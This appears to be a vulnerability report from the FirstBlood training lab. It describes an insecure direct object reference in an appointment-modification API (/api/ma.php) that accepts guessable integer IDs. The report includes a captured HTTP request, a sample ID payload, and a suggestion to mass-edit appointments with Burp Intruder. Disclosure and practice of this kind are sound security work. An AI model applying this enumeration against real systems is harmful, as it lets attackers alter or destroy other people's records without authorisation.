FirstBlood-#127IDOR on ma.php
This issue was discovered on FirstBlood v1

On 2021-05-10, jpdev Level 3 reported:


The manage appointments API allows for the use of interger values by capturing the request within burp and amending the guid to its interger id. This ID can be found on the index page of the drpanel within the source of the page within the getinfo function call.


POST /api/ma.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 24
DNT: 1
Connection: close
Cookie: drps=62f02a3467fff377e02116e10



A melicious user can now use BURP intruder to amend all appointments removing potentially key notes.

P2 High

Endpoint: /api/ma.php

Parameter: id=

Payload: 56911904

FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.